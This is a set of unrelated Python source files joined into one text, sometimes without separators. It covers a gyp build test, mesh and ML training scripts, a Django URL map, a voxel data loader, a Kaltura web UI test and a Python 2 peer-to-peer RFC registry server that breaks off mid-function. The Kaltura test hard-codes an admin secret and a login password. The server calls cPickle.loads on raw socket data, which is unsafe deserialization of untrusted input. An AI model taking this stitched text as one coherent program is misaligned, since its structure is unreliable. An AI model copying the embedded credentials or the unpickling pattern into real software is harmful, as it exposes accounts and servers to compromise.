# Copyright (c) 2015 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure that the (custom) NoImportLibrary flag is handled correctly.
"""
import TestGyp
import os
import sys
# This gyp regression test only applies to the Windows/ninja toolchain.
if sys.platform == 'win32':
    test = TestGyp.TestGyp(formats=['ninja'])
    CHDIR = 'importlib'
    # generate ninja files and build the fixture project
    test.run_gyp('noimplib.gyp', chdir=CHDIR)
    test.build('noimplib.gyp', test.ALL, chdir=CHDIR)
    # The target has an entry point, but no exports. Ordinarily, ninja expects
    # all DLLs to export some symbols (with the exception of /NOENTRY resource-
    # only DLLs). When the NoImportLibrary flag is set, this is suppressed. If
    # this is not working correctly, the expected .lib will never be generated
    # but will be expected, so the build will not be up to date.
    test.up_to_date('noimplib.gyp', test.ALL, chdir=CHDIR)
    test.pass_test()
|
import math
import stl
from stl import mesh
import numpy
import glob
def combine_stl(data_dir):
    '''Combine every STL file in *data_dir* into a single mesh.

    Reads each ``*.stl`` file found in ``data_dir``, concatenates their
    triangle data, and writes the merged mesh to ``combine.stl`` (ASCII
    mode) in the current working directory.

    :param data_dir: directory to scan for ``.stl`` files.
    '''
    import os  # local import: os is not imported at the top of this file
    # Bug fix: the glob pattern previously used the literal string
    # 'data_dir/*.stl' instead of the data_dir argument, so the parameter
    # was silently ignored.
    stl_dir = os.path.join(data_dir, '*.stl')
    # Start from an empty mesh and concatenate each file's triangles into it
    data = numpy.zeros(0, dtype=mesh.Mesh.dtype)
    combine = mesh.Mesh(data, remove_empty_areas=False)
    files = glob.glob(stl_dir)
    for fl in files:
        stl_fl = mesh.Mesh.from_file(fl)
        combine = mesh.Mesh(numpy.concatenate([stl_fl.data, combine.data]))
    combine.save('combine.stl', mode=stl.Mode.ASCII)
|
# class 1
# 7/11/16
# Write a function that takes an input and does something with it
# Variables, inputs, basic methods

# radius of a circle
input_value = input("Enter a radius:")
radius = float(input_value)
area = 3.14159 * radius * radius
print("The area of a circle with radius " + input_value + " is: " + str(area))

# convert mm to diopters (diopters = 1000 / focal length in mm / 10 == 100 / mm... kept as-is)
input_val = input("Enter a focal length in mm: ")
focal_length = float(input_val)
diopters = 100 / focal_length
print("The dioptric value for a " + input_val + "mm focal length is: " + str(diopters) + "D")

# favorite tea
input_val = input("What is your favorite type of tea? ")
if (input_val.lower() == 'rooibos'):
    print("Rooibos is also my favorite type of tea!")
else:
    # bug fix: added the missing space so the tea name no longer runs into
    # "sounds great!" (previously printed e.g. "Earl Greysounds great!")
    print(input_val + " sounds great!")
"""
Main file
We will run the whole program from here
"""
import torch
import hydra
from train import train
from dataset import VQADataset
from models.base_model import VQAModel
from torch.utils.data import DataLoader
from utils import main_utils, train_utils
from utils.train_logger import TrainLogger
from omegaconf import DictConfig, OmegaConf
torch.backends.cudnn.benchmark = True
@hydra.main(config_path="config", config_name='config')
def main(cfg: DictConfig) -> None:
    """
    Run the code following a given configuration
    :param cfg: configuration file retrieved from hydra framework
    """
    main_utils.init(cfg)
    logger = TrainLogger(exp_name_prefix=cfg['main']['experiment_name_prefix'], logs_dir=cfg['main']['paths']['logs'])
    logger.write(OmegaConf.to_yaml(cfg))
    # Set seed for results reproduction
    main_utils.set_seed(cfg['main']['seed'])
    # Load dataset
    # NOTE(review): image/question paths are hard-coded to the /datashare
    # mount - confirm they exist on the target machine.
    path_image_train = '/datashare/train2014/COCO_train2014_'
    path_question_train = '/datashare/v2_OpenEnded_mscoco_train2014_questions.json'
    train_dataset = VQADataset(path_answers=cfg['main']['paths']['train'],
                               path_image=path_image_train, path_questions=path_question_train)
    path_image_val = '/datashare/val2014/COCO_val2014_'
    path_question_val = '/datashare/v2_OpenEnded_mscoco_val2014_questions.json'
    # the validation set reuses the vocabulary built from the training set
    val_dataset = VQADataset(path_answers=cfg['main']['paths']['validation'], path_image=path_image_val,
                             path_questions=path_question_val, word_dict=train_dataset.word_dict)
    train_loader = DataLoader(train_dataset, cfg['train']['batch_size'], shuffle=True,
                              num_workers=cfg['main']['num_workers'])
    eval_loader = DataLoader(val_dataset, cfg['train']['batch_size'], shuffle=True,
                             num_workers=cfg['main']['num_workers'])
    image_dim = train_dataset.pic_size
    output_dim =2410 # possible answers
    model = VQAModel(batch_size=cfg['train']['batch_size'], word_vocab_size=train_dataset.vocab_size,
                     lstm_hidden=cfg['train']['num_hid'], output_dim=output_dim, dropout=cfg['train']['dropout'],
                     word_embedding_dim=cfg['train']['word_embedding_dim'], question_output_dim = cfg['train']['question_output_dim'],
                     image_dim= image_dim, last_hidden_fc_dim= cfg['train']['last_hidden_fc_dim'])
    # optional multi-GPU wrapping, then move to GPU when one is available
    if cfg['main']['parallel']:
        model = torch.nn.DataParallel(model)
    if torch.cuda.is_available():
        model = model.cuda()
    logger.write(main_utils.get_model_string(model))
    # Run model
    train_params = train_utils.get_train_params(cfg)
    # Report metrics and hyper parameters to tensorboard
    metrics = train(model, train_loader, eval_loader, train_params, logger)
    hyper_parameters = main_utils.get_flatten_dict(cfg['train'])
    logger.report_metrics_hyper_params(hyper_parameters, metrics)
if __name__ == '__main__':
    main()
|
import os
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential, Model
from keras.layers import Input, Activation, Dropout, Flatten, Dense
from keras import callbacks
from keras import optimizers
import numpy as np
from resnet import ResnetBuilder
# Training hyper-parameters and data locations.
batch_size = 300
num_classes = 3
img_rows, img_cols = 30, 30
channels = 3
train_data_dir = './train_data/'
validation_data_dir = './val_data/'
log_filepath = './log/'
num_train_samples = 100000
num_val_samples = 20000
num_epoch = 100
result_dir = './result/'
if not os.path.exists(result_dir):
    os.mkdir(result_dir)
if __name__ == '__main__':
    # Build the ResNet-50 model (channels-first input: [3, 30, 30])
    input_shape = [3, 30, 30]
    resnet50 = ResnetBuilder.build_resnet_50(input_shape, num_classes)
    # NOTE(review): Keras 1-style keyword arguments are used here and below
    # (input=/output=, samples_per_epoch, nb_epoch, nb_val_samples) - confirm
    # the installed Keras version still accepts them.
    model = Model(input=resnet50.input, output=resnet50.output)
    # SGD with momentum is said to work well for this task
    model.compile(loss='categorical_crossentropy',
                  optimizer=optimizers.SGD(lr=1e-2, decay=1e-6, momentum=0.9, nesterov=True),
                  metrics=['accuracy'])
    datagen = ImageDataGenerator(data_format="channels_first")
    train_generator = datagen.flow_from_directory(
        train_data_dir,
        target_size=(img_rows, img_cols),
        color_mode='rgb',
        class_mode='categorical',
        batch_size=batch_size,
        shuffle=True)
    validation_generator = datagen.flow_from_directory(
        validation_data_dir,
        target_size=(img_rows, img_cols),
        color_mode='rgb',
        class_mode='categorical',
        batch_size=batch_size,
        shuffle=True)
    # checkpoint every epoch and log training curves to TensorBoard
    cp_cb = callbacks.ModelCheckpoint(
        filepath = './result/model{epoch:02d}-loss{loss:.2f}-acc{acc:.2f}-vloss{val_loss:.2f}-vacc{val_acc:.2f}.h5',
        monitor='val_loss',
        verbose=1,
        save_best_only=False,
        mode='auto')
    tb_cb = callbacks.TensorBoard(
        log_dir=log_filepath,
        histogram_freq=0,
        write_graph=True,
        write_images=True)
    history = model.fit_generator(
        train_generator,
        samples_per_epoch=num_train_samples,
        nb_epoch=num_epoch,
        callbacks=[cp_cb, tb_cb],
        validation_data=validation_generator,
        nb_val_samples=num_val_samples)
    model.save_weights(os.path.join(result_dir, 'trained_model.h5'))
    # NOTE(review): save_history is not defined or imported in this file -
    # confirm it is provided elsewhere before running.
    save_history(history, os.path.join(result_dir, 'history.txt'))
import pandas as pd
def to_reise(data):
    """Format data for REISE.

    :param pandas.DataFrame data: data frame as returned by
        :func:`prereise.gather.winddata.rap.rap.retrieve_data`.
    :return: (*pandas.DataFrame*) -- data frame formatted for REISE: one row
        per time step (index named "UTC"), one column per plant id.
    """
    ts = data["ts"].unique()
    # plant ids are taken from the first time step and reused for every row
    plant_id = data[data.ts_id == 1].plant_id.values
    # Build all rows first and concatenate once: DataFrame.append was removed
    # in pandas 2.0 and the repeated-append pattern was O(n^2) anyway.
    rows = [
        pd.DataFrame({"Pout": data[data.ts_id == i].Pout.values}, index=plant_id).T
        for i in range(1, max(data.ts_id) + 1)
    ]
    profile = pd.concat(rows, sort=False, ignore_index=True)
    profile.set_index(ts, inplace=True)
    profile.index.name = "UTC"
    return profile
|
from django.urls import path
from .views import certPost, certDetailView, certUpdate, toProxyView
app_name ='manager'
# Bind REST-framework viewset actions to concrete view callables.
info_post = certPost.as_view({
    'post': 'create',
})
detail = certDetailView.as_view({
    'get': 'list',
})
info_update = certUpdate.as_view({
    'post': 'partial_update',
})
# URL routes for the certificate manager app.
urlpatterns = [
    path('', detail, name='certDetailView'),
    path('add/', info_post, name='certPost'),
    path('update/<pk>', info_update, name='certUpdate'),
    path('userpattern/', toProxyView.as_view(), name='toproxy'),
]
"""Helper modules for spectrum SimSUSY-based spectrum generators."""
|
# -*- coding: utf-8 -*-
"""
pelesent
~~~~~~~~~~~~~~~~~~~
Sentiment analysis from pelenudos to pelenudos
:copyright: (c) 2017 by Marcos Treviso
:licence: MIT, see LICENSE for more details
"""
from __future__ import absolute_import, unicode_literals
import logging
import theano
theano.config.floatX = 'float32'  # XXX: has to come before loading anything related to Theano or Keras
# Generate your own AsciiArt at:
# patorjk.com/software/taag/#f=Calvin%20S&t=PeleSent
__banner__ = r"""
╔═╗┌─┐┬ ┌─┐╔═╗┌─┐┌┐┌┌┬┐
╠═╝├┤ │ ├┤ ╚═╗├┤ │││ │
╩ └─┘┴─┘└─┘╚═╝└─┘┘└┘ ┴
"""
# Package metadata consumed by setup tooling and documentation.
__prog__ = 'pelesent'
__title__ = 'PeleSent'
__summary__ = 'Sentiment analysis from pelenudos to pelenudos.'
__uri__ = 'https://www.github.com/mtreviso/pelesent'
__version__ = '0.0.1-alpha'
__author__ = 'Marcos Treviso'
__email__ = 'marcostreviso@usp.br'
__license__ = 'MIT'
__copyright__ = 'Copyright 2017 Marcos Treviso'
# the user should dictate what happens when a logging event occurs
logging.getLogger(__name__).addHandler(logging.NullHandler())
|
import numpy as np
import os
import re
from random import shuffle
import tensorflow as tf
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from mpl_toolkits import mplot3d
import random
class Data:
    """Loads, batches, shuffles and visualises paired X/Y voxel-grid files.

    NOTE: this module uses Python 2 print statements and dict APIs.
    """
    def __init__(self,config):
        # config is a dict of paths and hyper-parameters (see keys used below)
        self.config = config
        self.train_batch_index = 0
        self.test_seq_index = 0
        self.resolution = config['resolution']
        self.batch_size = config['batch_size']
        self.train_names = config['train_names']
        self.test_names = config['test_names']
        self.X_train_files, self.Y_train_files = self.load_X_Y_files_paths_all( self.train_names,label='train')
        self.X_test_files, self.Y_test_files = self.load_X_Y_files_paths_all(self.test_names,label='test')
        print "X_train_files:",len(self.X_train_files)
        print "X_test_files:",len(self.X_test_files)
        # batch counts: integer division, with one batch held back
        self.total_train_batch_num = int(len(self.X_train_files) // self.batch_size) -1
        self.total_test_seq_batch = int(len(self.X_test_files) // self.batch_size) -1
        self.batch_name = 'batchname'
    @staticmethod
    def output_Voxels(name, voxels):
        """Write occupied voxel coordinates (value > 0.5) to '<name>.asc', one 'x y z' per line."""
        if len(voxels.shape)>3:
            # collapse a trailing channel dimension: (x, y, z, c) -> (x, y, z)
            x_d = voxels.shape[0]
            y_d = voxels.shape[1]
            z_d = voxels.shape[2]
            v = voxels[:,:,:,0]
            v = np.reshape(v,(x_d,y_d,z_d))
        else:
            v = voxels
        x, y, z = np.where(v > 0.5)
        wfile = open(name+'.asc','w')
        for i in range(len(x)):
            data = str(x[i]) +' '+ str(y[i]) +' '+ str(z[i])
            wfile.write(data + '\n')
        wfile.close()
    @staticmethod
    def plotFromVoxels(name, voxels):
        """Scatter-plot occupied voxels (value > 0.5) in 3-D and save the figure to *name*."""
        if len(voxels.shape)>3:
            # collapse a trailing channel dimension: (x, y, z, c) -> (x, y, z)
            x_d = voxels.shape[0]
            y_d = voxels.shape[1]
            z_d = voxels.shape[2]
            v = voxels[:,:,:,0]
            v = np.reshape(v,(x_d,y_d,z_d))
        else:
            v = voxels
        #x, y, z = v.nonzero()
        x, y, z = np.where(v > 0.5)
        fig = plt.figure()
        ax = fig.add_subplot(111, projection='3d')
        ax.scatter(x, y, z, zdir='z', c='red')
        plt.savefig(name)
        plt.close()
        #plt.show()
    def load_X_Y_files_paths_all(self, obj_names, label='train'):
        """Collect full X/Y file paths for every object name, for 'train' or 'test'."""
        x_str=''
        y_str=''
        if label =='train':
            x_str='X_train_'
            y_str ='Y_train_'
        elif label == 'test':
            x_str = 'X_test_'
            y_str = 'Y_test_'
        else:
            print "label error!!"
            exit()
        X_data_files_all = []
        Y_data_files_all = []
        for name in obj_names:
            # folders are looked up in the config by composed key, e.g. 'X_train_<name>'
            X_folder = self.config[x_str + name]
            Y_folder = self.config[y_str + name]
            X_data_files, Y_data_files = self.load_X_Y_files_paths(X_folder, Y_folder)
            for X_f, Y_f in zip(X_data_files, Y_data_files):
                # X/Y files are paired by the first 15 characters of the name
                if X_f[0:15] != Y_f[0:15]:
                    print "index inconsistent!!\n"
                    exit()
                X_data_files_all.append(X_folder + X_f)
                Y_data_files_all.append(Y_folder + Y_f)
        return X_data_files_all, Y_data_files_all
    def load_X_Y_files_paths(self,X_folder, Y_folder):
        """Return the sorted file names found in the X and Y folders."""
        X_data_files = [X_f for X_f in sorted(os.listdir(X_folder))]
        Y_data_files = [Y_f for Y_f in sorted(os.listdir(Y_folder))]
        return X_data_files, Y_data_files
    def load_single_voxel_grid(self,path):
        """Load one sparse voxel file into a dense (64, 64, 64, 1) grid.

        The grid dimensions are encoded as the last three '_'-separated
        fields of the file name; occupied cells are written with value 20.
        """
        temp = re.split('_', path.split('.')[-2])
        x_d = int(temp[len(temp) - 3])
        y_d = int(temp[len(temp) - 2])
        z_d = int(temp[len(temp) - 1])
        a = np.loadtxt(path)
        if len(a)<=0:
            print " load_single_voxel_grid error: ", path
            exit()
        # NOTE(review): the dense grid is hard-coded to 64^3 even though
        # x_d/y_d/z_d are parsed above - confirm inputs never exceed 64.
        voxel_grid = np.zeros((64, 64, 64,1))
        for i in a:
            voxel_grid[int(i[0]), int(i[1]), int(i[2]),0] = 20 # occupied
        return voxel_grid
    def load_X_Y_voxel_grids(self,X_data_files, Y_data_files):
        """Load one full batch of X/Y voxel grids as numpy arrays."""
        if len(X_data_files) !=self.batch_size or len(Y_data_files)!=self.batch_size:
            print "load_X_Y_voxel_grids error:", X_data_files, Y_data_files
            exit()
        X_voxel_grids = []
        Y_voxel_grids = []
        index = -1
        for X_f, Y_f in zip(X_data_files, Y_data_files):
            index += 1
            X_voxel_grid = self.load_single_voxel_grid(X_f)
            X_voxel_grids.append(X_voxel_grid)
            Y_voxel_grid = self.load_single_voxel_grid(Y_f)
            Y_voxel_grids.append(Y_voxel_grid)
        X_voxel_grids = np.asarray(X_voxel_grids)
        Y_voxel_grids = np.asarray(Y_voxel_grids)
        return X_voxel_grids, Y_voxel_grids
    def shuffle_X_Y_files(self, label='train'):
        """Shuffle the X/Y file lists in unison and reset the batch cursor."""
        X_new = []; Y_new = []
        if label == 'train':
            X = self.X_train_files; Y = self.Y_train_files
            self.train_batch_index = 0
            # shuffle indices so X and Y stay paired
            index = range(len(X))
            shuffle(index)
            for i in index:
                X_new.append(X[i])
                Y_new.append(Y[i])
            self.X_train_files = X_new
            self.Y_train_files = Y_new
        elif label == 'test':
            X = self.X_test_files; Y = self.Y_test_files
            self.test_seq_index = 0
            index = range(len(X))
            shuffle(index)
            for i in index:
                X_new.append(X[i])
                Y_new.append(Y[i])
            self.X_test_files = X_new
            self.Y_test_files = Y_new
        else:
            print "shuffle_X_Y_files error!\n"
            exit()
    ###################### voxel grids
    def load_X_Y_voxel_grids_train_next_batch(self):
        """Load the next sequential training batch and advance the cursor."""
        X_data_files = self.X_train_files[self.batch_size * self.train_batch_index:self.batch_size * (self.train_batch_index + 1)]
        Y_data_files = self.Y_train_files[self.batch_size * self.train_batch_index:self.batch_size * (self.train_batch_index + 1)]
        self.train_batch_index += 1
        self.batch_name = X_data_files
        X_voxel_grids, Y_voxel_grids = self.load_X_Y_voxel_grids(X_data_files, Y_data_files)
        return X_voxel_grids, Y_voxel_grids
    def load_X_Y_voxel_grids_test_next_batch(self,fix_sample=False):
        """Load a random test batch; fix_sample=True makes the sample reproducible."""
        if fix_sample:
            random.seed(45)
        idx = random.sample(range(len(self.X_test_files)), self.batch_size)
        X_test_files_batch = []
        Y_test_files_batch = []
        for i in idx:
            X_test_files_batch.append(self.X_test_files[i])
            Y_test_files_batch.append(self.Y_test_files[i])
        self.batch_name = X_test_files_batch
        X_test_batch, Y_test_batch = self.load_X_Y_voxel_grids(X_test_files_batch, Y_test_files_batch)
        return X_test_batch, Y_test_batch
|
import sys,os
sys.path.insert(1,os.path.abspath(os.path.join(os.path.dirname( __file__ ),'..','..','..','lib')))
import time, pytest
from clsCommon import Common
import clsTestService
from localSettings import *
import localSettings
from utilityTestFunc import *
import enums
class Test:
    """End-to-end KMS test: create a free-trial instance, then upload and publish media on it."""
    #================================================================================================================================
    # @Author: Michal Zomper
    # Test Name : Free trial
    # Test description:
    # create new free trial instance
    # In the new instance upload and publish media
    #================================================================================================================================
    testNum = "653"
    supported_platforms = clsTestService.updatePlatforms(testNum)
    status = "Pass"
    timeout_accured = "False"
    driver = None
    common = None
    # Test variables
    entryName = None
    entryDescription = "Description"
    entryTags = "Tags,"
    SearchByInSaaSAdmin = "Hostname"
    PartnerID = "2178791"
    instanceNumber = None
    InstanceSuffix = ".qakmstest.dev.kaltura.com"
    AdminSecret = "a884f9a36523cc14e05f265ed9920999"
    InstanceId = "MediaSpace"
    CompanyName = "Kaltura"
    Application = "MediaSpace"
    UserID = "qaapplicationautomation@mailinator.com"
    Password = "Kaltura1!"
    categoryList = [("About Kaltura")]
    filePath = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\videos\QR_Code_10sec.mp4'
    # the shared free-trial counter file lives in a different location on the
    # automation environment vs. a developer machine
    if clsTestService.isAutomationEnv() == True:
        instanceNumberFilePath = '/home/local/KALTURA/oleg.sigalov/FreeTrial/FreeTrial.txt'
    else:
        instanceNumberFilePath = r'Q:\FreeTrial\FreeTrial.txt'
    #run test as different instances on all the supported platforms
    @pytest.fixture(scope='module',params=supported_platforms)
    def driverFix(self,request):
        return request.param
    def test_01(self,driverFix,env):
        """Main flow: create instance, login, upload an entry, publish it."""
        #write to log we started the test
        logStartTest(self,driverFix)
        try:
            ########################### TEST SETUP ###########################
            #capture test start time
            self.startTime = time.time()
            #initialize all the basic vars and start playing
            self,self.driver = clsTestService.initialize(self, driverFix)
            self.common = Common(self.driver)
            self.entryName = clsTestService.addGuidToString("Free trial", self.testNum)
            ##################### TEST STEPS - MAIN FLOW #####################
            writeToLog("INFO","Step 1: navigate to free trial url form")
            self.instanceNumber = self.common.freeTrail.setInstanceNumber(self.instanceNumberFilePath)
            if self.instanceNumber == False:
                self.status = "Fail"
                writeToLog("INFO","Step 1: FAILED to set instance number")
                return
            writeToLog("INFO","Step 2: navigate to free trial url form")
            if self.common.base.navigate("http://qakmstest.dev.kaltura.com/free-trial-test/") == False:
                self.status = "Fail"
                writeToLog("INFO","Step 2: FAILED navigate to free trail url form: http://qakmstest.dev.kaltura.com/free-trial-test/")
                return
            writeToLog("INFO","Step 3: create free trial instance")
            if self.common.freeTrail.createFreeTrialInctance(self.PartnerID, self.AdminSecret, self.InstanceId, self.CompanyName, self.instanceNumber + self.InstanceSuffix, self.Application) == None:
                self.status = "Fail"
                writeToLog("INFO","Step 3: FAILED to create free trial instance")
                return
            sleep(2)
            # point all subsequent navigation at the newly created instance
            localSettings.LOCAL_SETTINGS_TEST_BASE_URL = "http://"+self.instanceNumber + self.InstanceSuffix
            localSettings.LOCAL_SETTINGS_KMS_LOGIN_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/user/login'
            localSettings.LOCAL_SETTINGS_KMS_MY_MEDIA_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/my-media'
            writeToLog("INFO","Step 4: navigate to new instance url")
            if self.common.base.navigate(localSettings.LOCAL_SETTINGS_TEST_BASE_URL) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 4: FAILED navigate to instance url: " + localSettings.LOCAL_SETTINGS_TEST_BASE_URL)
                return
            writeToLog("INFO","Step 5: login to instance")
            if self.common.login.loginToKMS(self.UserID, self.Password, localSettings.LOCAL_SETTINGS_KMS_LOGIN_URL) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 5: FAILED to login to new instance")
                return
            sleep(2)
            writeToLog("INFO","Step 6: Going to upload entry")
            if self.common.upload.uploadEntry(self.filePath, self.entryName, self.entryDescription, self.entryTags) == None:
                self.status = "Fail"
                writeToLog("INFO","Step 6: FAILED failed to upload entry: " + self.entryName)
                return
            sleep(2)
            writeToLog("INFO","Step 7: Going navigate to my media")
            if self.common.myMedia.navigateToMyMedia(forceNavigate=True) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 7: FAILED navigate to my media")
                return
            writeToLog("INFO","Step 8: Going to navigate to entry page")
            if self.common.entryPage.navigateToEntryPageFromMyMedia(self.entryName) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 8: FAILED navigate to entry page: '" + self.entryName + "'")
                return
            sleep(2)
            writeToLog("INFO","Step 9: Going to publish the entry ")
            if self.common.myMedia.publishSingleEntry(self.entryName, self.categoryList, "", publishFrom = enums.Location.ENTRY_PAGE) == False:
                self.status = "Fail"
                writeToLog("INFO","Step 9: FAILED to publish entry '" + self.entryName + "'")
                return
            ##################################################################
            writeToLog("INFO","TEST PASSED: 'Free Trial' was done successfully")
        # if an exception happened we need to handle it and fail the test
        except Exception as inst:
            self.status = clsTestService.handleException(self,inst,self.startTime)
    ########################### TEST TEARDOWN ###########################
    def teardown_method(self,method):
        """Clean up the created entry, tear down the driver and assert the final status."""
        try:
            self.common.handleTestFail(self.status)
            writeToLog("INFO","**************** Starting: teardown_method ****************")
            self.common.myMedia.deleteSingleEntryFromMyMedia(self.entryName)
            writeToLog("INFO","**************** Ended: teardown_method *******************")
        except:
            pass
        clsTestService.basicTearDown(self)
        #write to log we finished the test
        logFinishedTest(self,self.startTime)
        assert (self.status == "Pass")
    # NOTE(review): executes pytest at class-definition time; placed at class
    # scope because 'testNum' only resolves there - confirm intended placement.
    pytest.main('test_' + testNum + '.py --tb=line')
import socket
import thread
import cPickle as cp
from thread import *
# P2P-CI registry server setup (Python 2): listen on the well-known port.
PortOfServer = 7734
SocketOfServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
NameOfSocket=socket.gethostbyname(socket.gethostname())
# allow quick restarts of the server on the same address/port
SocketOfServer.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
SocketOfServer.bind((NameOfSocket, PortOfServer))
SocketOfServer.listen(4)
print 'Server is ready to go.'
# registry state shared by all client handler threads:
PeerDictionary = {}   # "host:port" -> data the peer sent on connect
TitleDictionary = {}  # RFC number -> RFC title
HostDictionary = {}   # RFC number -> '-'-terminated string of hosts holding it
def AddingToDictionary(hostname, data):
    """Register a peer: remember the data it sent under its 'host:port' key."""
    global PeerDictionary
    PeerDictionary.update({hostname: data})
def AddRFCfunc(NumberOfRFC, NameOfClient, PortNumOfClient, TitleOfRFC):
    """Record that *NameOfClient* holds the given RFC.

    Hosts are stored as a single '-'-terminated string per RFC number; a new
    RFC also gets its title registered.
    """
    global HostDictionary, TitleDictionary
    if NumberOfRFC in TitleDictionary:
        # known RFC: append this client to the existing host string
        HostDictionary[NumberOfRFC] = HostDictionary.get(NumberOfRFC) + str(NameOfClient) + "-"
    else:
        # first sighting of this RFC: register title and first host
        TitleDictionary[NumberOfRFC] = TitleOfRFC
        HostDictionary[NumberOfRFC] = NameOfClient + "-"
def ListRFC(NameOfClient, PortNameOfClient):
    """Build the P2P-CI response listing every registered (RFC, host) pair."""
    global HostDictionary, TitleDictionary, PeerDictionary
    if not HostDictionary:
        return "P2P-CI/1.0 404 Not Found\r\n"
    lines = ["P2P-CI/1.0 200 OK"]
    for rfc_number in HostDictionary.keys():
        # hosts are stored as a '-'-terminated string, e.g. "hostA-hostB-",
        # so the final split element is empty and is skipped
        hosts = HostDictionary.get(rfc_number).split('-')
        for host in hosts[:-1]:
            lines.append("RFC " + str(rfc_number) + " " + str(TitleDictionary.get(rfc_number)) + " " + str(host) + " " + str(PortNameOfClient))
    return "\r\n".join(lines) + "\r\n"
def lookupFunc(NumberOfRFC, NameOfClient, PortNumOfClient, TitleOfRFC):
    """Build the P2P-CI response for a LOOKUP of one RFC by number and title.

    Returns a 200 response listing every host that holds the RFC, or a 404
    line when the RFC (with a matching title) is not registered.  The result
    is also stored in the module-level ``lookupmsg`` (kept for compatibility
    with the original behaviour).
    """
    global HostDictionary, TitleDictionary, PeerDictionary, lookupmsg
    if NumberOfRFC in TitleDictionary and TitleDictionary[NumberOfRFC] == TitleOfRFC:
        lookupmsg = "P2P-CI/1.0 200 OK"
        # hosts are a '-'-terminated string; final empty element is skipped
        individualhosts = HostDictionary.get(NumberOfRFC).split('-')
        # Bug fix: each response line previously used individualhosts[0], so
        # every line repeated the first host instead of listing each holder
        # (compare ListRFC, which correctly iterates the hosts).
        for host in individualhosts[:-1]:
            lookupmsg = lookupmsg + "\r\n" + "RFC " + str(NumberOfRFC) + " " + str(TitleOfRFC) + " " + str(host) + " " + str(PortNumOfClient)
        lookupmsg = lookupmsg + "\r\n"
    else:
        lookupmsg = "P2P-CI/1.0 404 Not Found\r\n"
    return lookupmsg
def initialization(connection, addr):
    """Per-client handler thread: register the peer, then serve its requests.

    Requests arrive as pickled strings and are dispatched on their leading
    characters: 'A' -> ADD, 'LI' -> LIST ALL, 'LO' -> LOOKUP, 'E' -> EXIT.
    """
    global HostDictionary,TitleDictionary,PeerDictionary
    # first message is the peer's registration data (its upload port, etc.)
    data = cp.loads(connection.recv(1024))
    hostname=addr[0]+":"+str(data[0])
    AddingToDictionary(hostname, data)
    while 1:
        ReceivedMessage = connection.recv(1024)
        ClientMessage = cp.loads(ReceivedMessage)
        print 'message received from client for, ' + str(ClientMessage[0])
        if ClientMessage[0][0] == 'A':
            # ADD RFC <num> P2P-CI/1.0 \r\n Host: ... \r\n Port: ... \r\n Title: ...
            split = ClientMessage[0].split('\r\n')
            print '##########################################'+split[0][split[0].find("C ")+2:split[0].find(" P")]+'######################3'
            if 'P2P-CI/1.0' in split[0]:
                if len(split) == 5 and "ADD RFC " in split[0] and "Host: " in split[1] and "Port: " in split[2] and "Title: " in split[3]:
                    # carve the fields out of the request lines by marker offsets
                    NumberOfRFC=split[0][split[0].find("C ")+2:split[0].find(" P")]
                    NameOfClient=split[1][split[1].find("Host: ")+6:]
                    PortNumOfClient=split[2][split[2].find("Port: ")+6:]
                    TitleOfRFC=split[3][split[3].find("Title: ")+7:]
                    p2p_version=split[0][split[0].find(" P")+1:]
                    AddRFCfunc(NumberOfRFC, NameOfClient, PortNumOfClient, TitleOfRFC)
                    message = "P2P-CI/1.0 200 OK\r\n"+split[1]+"\r\n"+split[2]+"\r\n"+split[3]+"\r\n"
                    connection.send(message)
                else:
                    message="400 Bad Request\r\n"
                    connection.send(message)
            else:
                message = "505 P2P-CI Version Not Supported\r\n"
                connection.send(message)
        elif ClientMessage[0][0] == 'L':
            if ClientMessage[0][1] == 'I':
                # LIST ALL request: return every registered (RFC, host) pair
                split_data = ClientMessage[0].split('\r\n')
                if 'P2P-CI/1.0' in split_data[0]:
                    if len(split_data) == 4 and "LIST ALL " in split_data[0] and "Host: " in split_data[1] and "Port: " in split_data[2]:
                        NameOfClient=split_data[1][split_data[1].find("Host: ")+6:]
                        PortNumOfClient=split_data[2][split_data[2].find("Port: ")+6:]
                        message=ListRFC(NameOfClient, PortNumOfClient)
                        connection.send(message)
                    else:
                        message="400 Bad Request\r\n"
                        connection.send(message)
                else:
                    message = "505 P2P-CI Version Not Supported\r\n"
                    connection.send(message)
            elif ClientMessage[0][1] == 'O':
                # LOOKUP request: return hosts holding one specific RFC
                split_data = ClientMessage[0].split('\r\n')
                if 'P2P-CI/1.0' in split_data[0]:
                    print split_data[0]
                    print split_data[1]
                    print split_data[2]
                    print split_data[3]
                    length_of_split = len(split_data)
                    if len(split_data) == 5 and "LOOKUP RFC " in split_data[0] and "Host: " in split_data[1] and "Port: " in split_data[2] and "Title: " in split_data[3]:
                        NumberOfRFC=split_data[0][split_data[0].find("C ")+2:split_data[0].find(" P")]
                        NameOfClient=split_data[1][split_data[1].find("Host: ")+6:]
                        PortNumOfClient=split_data[2][split_data[2].find("Port: ")+6:]
                        TitleOfRFC=split_data[3][split_data[3].find("Title: ")+7:]
                        print TitleOfRFC
                        p2p_version=split_data[0][split_data[0].find(" P")+1:]
                        reqmessage=lookupFunc(NumberOfRFC, NameOfClient, PortNumOfClient, TitleOfRFC)
                        connection.send(reqmessage)
                    else:
                        message="400 Bad Request\r\n"
                        connection.send(message)
                else:
                    message = "505 P2P-CI Version Not Supported\r\n"
                    connection.send(message)
        elif ClientMessage[0][0] == 'E':
            # EXIT request: remove this client from every RFC's host list,
            # dropping RFCs it was the only holder of, then close the socket.
            split_data = ClientMessage[0].split('\r\n')
            NameOfClient=split_data[1][split_data[1].find("Host: ")+6:]
            PortNumOfClient=split_data[2][split_data[2].find("Port: ")+6:]
            listOfRFC = HostDictionary.keys()
            print "Exit RFC"
            for rfc in listOfRFC:
                ListOfRFChost = HostDictionary.get(rfc)
                individualhosts=ListOfRFChost.split('-')
                l=len(individualhosts)
                if l==2 and NameOfClient in individualhosts[0]:
                    # this client was the only holder - drop the RFC entirely
                    TitleDictionary.pop(rfc,None)
